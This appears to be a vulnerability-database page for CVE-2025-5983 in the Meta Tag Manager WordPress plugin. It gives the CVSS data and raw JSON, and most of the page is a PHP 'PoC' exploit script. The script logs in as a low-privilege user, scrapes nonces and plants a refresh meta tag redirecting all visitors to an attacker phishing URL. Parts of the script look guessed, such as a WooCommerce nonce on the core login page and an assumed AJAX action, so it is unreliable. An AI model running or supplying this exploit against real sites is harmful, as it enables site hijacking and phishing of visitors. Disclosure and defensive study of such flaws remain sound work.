Security Vulnerability Report
中文
CVE-2025-5983 CVSS 6.5 MEDIUM

CVE-2025-5983

Published: 2025-10-22 06:15:32
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Meta Tag Manager WordPress plugin before 3.3 does not restrict which roles can create http-equiv refresh meta tags.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Meta Tag Manager WordPress插件 < 3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-5983 - Meta Tag Manager Plugin Exploit PoC * Vulnerability: Missing role restriction on http-equiv refresh meta tag creation * Affected: Meta Tag Manager < 3.3 * * This PoC demonstrates how a low-privileged user can create * a malicious http-equiv refresh meta tag through the plugin's API. */ // Target WordPress site $target_url = 'https://target-wordpress-site.com'; $username = 'low_priv_user'; // Subscriber or Author role $password = 'user_password'; // Step 1: Authenticate to WordPress (obtain nonce and cookies) $login_url = $target_url . '/wp-login.php'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $login_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); $login_page = curl_exec($ch); // Extract login nonce preg_match('/name="woocommerce-login-nonce" value="([a-f0-9]+)"/', $login_page, $matches); $nonce = $matches[1] ?? ''; // Submit login credentials curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'log' => $username, 'pwd' => $password, 'wp-submit' => 'Log In', 'redirect_to'=> $target_url . '/wp-admin/', 'testcookie' => '1', ])); curl_exec($ch); // Step 2: Get admin nonce for meta tag manager AJAX action curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin.php?page=meta-tag-manager'); curl_setopt($ch, CURLOPT_POST, false); $admin_page = curl_exec($ch); preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $admin_page, $nonce_matches); $wp_nonce = $nonce_matches[1] ?? ''; // Step 3: Submit malicious http-equiv refresh meta tag via AJAX $malicious_payload = [ 'action' => 'save_meta_tags', '_wpnonce' => $wp_nonce, 'meta_tags' => [ [ 'http_equiv' => 'refresh', 'content' => '0;url=https://attacker-controlled-site.com/phishing', ] ], ]; curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php'); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($malicious_payload)); $response = curl_exec($ch); curl_close($ch); echo "[*] Exploit completed. Response: " . $response . "\n"; echo "[*] All visitors will now be redirected to attacker-controlled URL\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-5983", "sourceIdentifier": "[email protected]", "published": "2025-10-22T06:15:32.390", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Meta Tag Manager WordPress plugin before 3.3 does not restrict which roles can create http-equiv refresh meta tags."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "references": [{"url": "https://wpscan.com/vulnerability/4a2d4dcf-bb34-4eec-b5de-31c6a4d823cf/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.